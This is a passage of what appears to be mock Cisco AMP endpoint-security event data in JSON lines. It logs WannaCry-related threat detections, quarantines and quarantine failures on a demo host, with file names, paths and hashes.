Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
